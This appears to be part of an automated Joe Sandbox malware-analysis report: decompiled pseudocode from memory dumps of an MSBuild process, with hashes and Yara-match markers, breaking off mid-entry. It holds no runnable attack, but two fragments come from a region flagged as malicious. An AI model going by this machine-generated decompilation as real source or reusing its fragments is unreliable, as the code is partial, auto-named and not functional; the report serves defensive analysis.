                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v52);
                                            				_push(4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8de40ba711495d8b83a1d8d1054961d35ce40996dc13bdb0619f4e3bd92592bd
                                            • Instruction ID: 9514cd79db7b210e61dc327255f93d2a29b06980d328d42a2916c600a0b5915a
                                            • Opcode Fuzzy Hash: 8de40ba711495d8b83a1d8d1054961d35ce40996dc13bdb0619f4e3bd92592bd
                                            • Instruction Fuzzy Hash: F1F089B0A04259ABDB10EBB8D546E6E77B4EF14300F444469FA45DB381EA34D900C794
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E0102746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                            				signed int _t8;
                                            				void* _t10;
                                            				short* _t17;
                                            				void* _t19;
                                            				intOrPtr _t20;
                                            				void* _t21;
                                            
                                            				_t20 = __esi;
                                            				_t19 = __edi;
                                            				_t17 = __ebx;
                                            				if( *((char*)(_t21 - 0x25)) != 0) {
                                            					if(__ecx == 0) {
                                            						E0101EB70(__ecx, 0x10f79a0);
                                            					} else {
                                            						asm("lock xadd [ecx], eax");
                                            						if((_t8 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(__ecx + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                            						}
                                            					}
                                            					L10:
                                            				}
                                            				_t10 = _t19 + _t19;
                                            				if(_t20 >= _t10) {
                                            					if(_t19 != 0) {
                                            						 *_t17 = 0;
                                            						return 0;
                                            					}
                                            				}
                                            				return _t10;
                                            				goto L10;
                                            			}










                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe306661e320dd1b760ba3739a9e653c54ecb8321facdba64822dbaea5f7cac8
                                            • Instruction ID: 161426a721c5a79458127e6e914a9ec0a5fd4ea484a927ee120d4ef73175d537
                                            • Opcode Fuzzy Hash: fe306661e320dd1b760ba3739a9e653c54ecb8321facdba64822dbaea5f7cac8
                                            • Instruction Fuzzy Hash: 19F0E934944166EADF4A976CC840BBEFFB1BF34314F040255D9D1AB151EB249800C796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E010D8CD6(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				short _v38;
                                            				char _v44;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x10fd360 ^ _t25;
                                            				_v12 = __ecx;
                                            				_v38 = 0x1c2d;
                                            				if(E01027D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v44);
                                            				_push(0xffffffe4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f679a67c1f1bfcf26bd5ea13a69dee086439d1a910c311a56bf7fa5529bb9427
                                            • Instruction ID: 0fa6fa80f16f92de3ec38c735a18c8976bfb6d4521a246ab3f2979045938351e
                                            • Opcode Fuzzy Hash: f679a67c1f1bfcf26bd5ea13a69dee086439d1a910c311a56bf7fa5529bb9427
                                            • Instruction Fuzzy Hash: B6F0A770A04209AFDF04EBB8D946EAE77B8EF18300F5041AAF955EB3C1EA34D900C754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01004F2E(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0) {
                                            					L6:
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L8:
                                            						E010D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags != 0) {
                                            						goto L9;
                                            					}
                                            					goto L8;
                                            				}
                                            				_t18 = __ecx + 0x30;
                                            				if(E0102C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xfe1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L6;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}










                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103A44B(signed int __ecx) {
                                            				intOrPtr _t13;
                                            				signed int _t15;
                                            				signed int* _t16;
                                            				signed int* _t17;
                                            
                                            				_t13 =  *0x10f7b9c; // 0x0
                                            				_t15 = __ecx;
                                            				_t16 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                            				if(_t16 == 0) {
                                            					return 0;
                                            				}
                                            				 *_t16 = _t15;
                                            				_t17 =  &(_t16[2]);
                                            				E0104FA60(_t17, 0, _t15 << 2);
                                            				return _t17;
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E0100F358(void* __ecx, signed int __edx) {
                                            				char _v8;
                                            				signed int _t9;
                                            				void* _t20;
                                            
                                            				_push(__ecx);
                                            				_t9 = 2;
                                            				_t20 = 0;
                                            				if(E0103F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                            					_t20 = L01024620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				}
                                            				return _t20;
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101FF60(intOrPtr _a4) {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            				void* _t15;
                                            				void* _t16;
                                            				void* _t17;
                                            
                                            				_t14 = _a4;
                                            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xfe11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					return E010D88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                            				} else {
                                            					return E01020050(_t14);
                                            				}
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E010941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                            				void* _t5;
                                            				void* _t14;
                                            
                                            				_push(8);
                                            				_push(0x10e08f0);
                                            				_t5 = E0105D08C(__ebx, __edi, __esi);
                                            				if( *0x10f87ec == 0) {
                                            					E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                            					if( *0x10f87ec == 0) {
                                            						 *0x10f87f0 = 0x10f87ec;
                                            						 *0x10f87ec = 0x10f87ec;
                                            						 *0x10f87e8 = 0x10f87e4;
                                            						 *0x10f87e4 = 0x10f87e4;
                                            					}
                                            					 *(_t14 - 4) = 0xfffffffe;
                                            					_t5 = L01094248();
                                            				}
                                            				return E0105D0D1(_t5);
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010BD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                            				void* _t5;
                                            
                                            				if(_a4 != 0) {
                                            					_t5 = L0100E8B0(__ecx, _a4, 0xfff);
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            					return _t5;
                                            				}
                                            				return 0xc000000d;
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103A185() {
                                            				void* __ecx;
                                            				intOrPtr* _t5;
                                            
                                            				if( *0x10f67e4 >= 0xa) {
                                            					if(_t5 < 0x10f6800 || _t5 >= 0x10f6900) {
                                            						return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                            					} else {
                                            						goto L1;
                                            					}
                                            				} else {
                                            					L1:
                                            					return E01020010(0x10f67e0, _t5);
                                            				}
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E00417322(void* __eax, void* __edx) {
                                            				signed int _t10;
                                            
                                            				asm("out 0x2a, eax");
                                            				 *(__edx + 0x60e55f7) =  *(__edx + 0x60e55f7) | _t10;
                                            				asm("stosd");
                                            				asm("invalid");
                                            				return __eax;
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010316E0(void* __edx, void* __eflags) {
                                            				void* __ecx;
                                            				void* _t3;
                                            
                                            				_t3 = E01031710(0x10f67e0);
                                            				if(_t3 == 0) {
                                            					_t6 =  *[fs:0x30];
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                            						goto L1;
                                            					} else {
                                            						return L01024620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                            					}
                                            				} else {
                                            					L1:
                                            					return _t3;
                                            				}
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E00407B1B(void* __eax, signed int __edx, void* __edi) {
                                            
                                            				 *(__edx + 0x31) =  *(__edx + 0x31) & __edx;
                                            				_push(0x20401054);
                                            				return 1;
                                            			}




                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010853CA(void* __ebx) {
                                            				intOrPtr _t7;
                                            				void* _t13;
                                            				void* _t14;
                                            				intOrPtr _t15;
                                            				void* _t16;
                                            
                                            				_t13 = __ebx;
                                            				if( *((char*)(_t16 - 0x65)) != 0) {
                                            					E0101EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                            				}
                                            				if(_t15 != 0) {
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                            					return  *((intOrPtr*)(_t16 - 0x64));
                                            				}
                                            				return _t7;
                                            			}









                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101AAB0() {
                                            				intOrPtr* _t4;
                                            
                                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t4 != 0) {
                                            					if( *_t4 == 0) {
                                            						goto L1;
                                            					} else {
                                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                            					}
                                            				} else {
                                            					L1:
                                            					return 0x7ffe0030;
                                            				}
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction ID: b958c7eaa36f6bb867a609bff3498dc0a7960c25996f4e1ca034d2541f4f84c2
                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction Fuzzy Hash: 92D0E935352A80CFD657DB1DC954B1577E8BB44B44FC504D0E541CB766E72CE944CA00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010335A1(void* __eax, void* __ebx, void* __ecx) {
                                            				void* _t6;
                                            				void* _t10;
                                            				void* _t11;
                                            
                                            				_t10 = __ecx;
                                            				_t6 = __eax;
                                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                            				}
                                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                                            					return E0101EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            				}
                                            				return _t6;
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction ID: e02c075ede8086a257d232d9173690ae68751cc55e8f3cc2badf44c66eb34520
                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction Fuzzy Hash: E0D0A9318011819AEB82AB14C2987ACBBBABB80208F5820A594C20E9D2C33A4A0AC600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100DB40() {
                                            				signed int* _t3;
                                            				void* _t5;
                                            
                                            				_t3 = L01024620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                            				if(_t3 == 0) {
                                            					return 0;
                                            				} else {
                                            					 *_t3 =  *_t3 | 0x00000400;
                                            					return _t3;
                                            				}
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction ID: e98ed3c8c6975a3f8ae14a79c6f1819d4a7202e4e038dd67a7a825e4dc721a5d
                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction Fuzzy Hash: 95C08C30280E01EAFB325F60CD01B403AA0BB10B01F4400A0A740DA0F4DBB8D801EA10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0108A537(intOrPtr _a4, intOrPtr _a8) {
                                            
                                            				return L01028E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                            			}



                                            0x0108a553

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction ID: 6d80e2d0d0e2b313155baa56d095b5cb372b6f42a662bde6ef634e48e0ac2a82
                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction Fuzzy Hash: BAC01236080248BBCB126E81CC00F467B6AEBA4B60F008011FA480A5608632E970EA84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01023A1C(intOrPtr _a4) {
                                            				void* _t5;
                                            
                                            				return L01024620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            			}




                                            0x01023a35

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction ID: 36c702f6ba0aef755944b08f38bdd14f25a933524a892f6b22314a2c11e9acd0
                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction Fuzzy Hash: D7C08C32080248BBC722AE41DC00F017B29E7A4B60F000020FA040A5608572EC60D988
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100AD30(intOrPtr _a4) {
                                            
                                            				return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            			}



                                            0x0100ad49

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction ID: 40c92f8eadbc4f016c302acaeb9a507652bad1372265bb064eb5da14f2223512
                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction Fuzzy Hash: D1C08C32080248BBC7126A45CD00F017B29E7B0B60F000020F6040AA618932E860D588
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010336CC(void* __ecx) {
                                            
                                            				if(__ecx > 0x7fffffff) {
                                            					return 0;
                                            				} else {
                                            					return L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                            				}
                                            			}




                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction ID: db516114aa857ee7999a2bcaa415a5c4df2b210c5ce8bd9c4e6c2c0bccde1e68
                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction Fuzzy Hash: DBC02B74150440FFD7255F30CE40F147298F744A21F640394B220894F0D5689C00E500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010176E2(void* __ecx) {
                                            				void* _t5;
                                            
                                            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                            					return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                            				}
                                            				return _t5;
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction ID: 909429244c5063da853f13e0ba91c2b81bf3e49676668f4ba4f46813d24d7718
                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction Fuzzy Hash: 77C08C701411805AEB2A570CCE30B203A90BB3C608F4805DCEA91098A2C36CA842C208
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01027D50() {
                                            				intOrPtr* _t3;
                                            
                                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t3 != 0) {
                                            					return  *_t3;
                                            				} else {
                                            					return _t3;
                                            				}
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction ID: d2328a5a271690fd3b356545f9ae789fa173d2b30a0be98a10a5fda9b8ba3311
                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction Fuzzy Hash: 31B092353019408FCE56EF28C080B1533F4BB44A40B8400D0E400CBA21D229E8008900
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01032ACB() {
                                            				void* _t5;
                                            
                                            				return E0101EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            			}




                                            0x01032adc

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction ID: 082addae60d83314a77788279de419fc4ca2fb045c61c96bea6daf345f2ce5b2
                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction Fuzzy Hash: 30B01232C10441CFCF03EF40C650B5E7331FB40750F054490940127970C22CAC01CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cd232bc73f993059524da4ecfb97dde8b4573356886055c2536c5d91c8b777e
                                            • Instruction ID: 03fb9215c31457180455dbfa4731527119ac743eb386c1f07f4a2715b410f81a
                                            • Opcode Fuzzy Hash: 4cd232bc73f993059524da4ecfb97dde8b4573356886055c2536c5d91c8b777e
                                            • Instruction Fuzzy Hash: 81900265221005030286A599460450B0949F7D6391391C016F5806590CC66188A56361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5017b111e18fcab267a701cb53c214d77054146ad9a5aa3a7a093faa4eeb9bb1
                                            • Instruction ID: 3ed686f069ac667eafc0dc1c6a2bb69e80833efd7c82200990391c74c4b3f279
                                            • Opcode Fuzzy Hash: 5017b111e18fcab267a701cb53c214d77054146ad9a5aa3a7a093faa4eeb9bb1
                                            • Instruction Fuzzy Hash: 8490027120100D03D245619988046870509E7D0341F51C012AA414655ED6A588D17271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 311d590ef16c0498a6f8b2d8b253540aebc7808dc72d03a8b6bb56356653557f
                                            • Instruction ID: 11d65f8c69fd51a052c24bed82c039a346f1c300b74f3e66089cf24f89000a5d
                                            • Opcode Fuzzy Hash: 311d590ef16c0498a6f8b2d8b253540aebc7808dc72d03a8b6bb56356653557f
                                            • Instruction Fuzzy Hash: 5A900271301005539641A6D99804A4B4609E7F0341B51D016A8404554CC59488A16261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
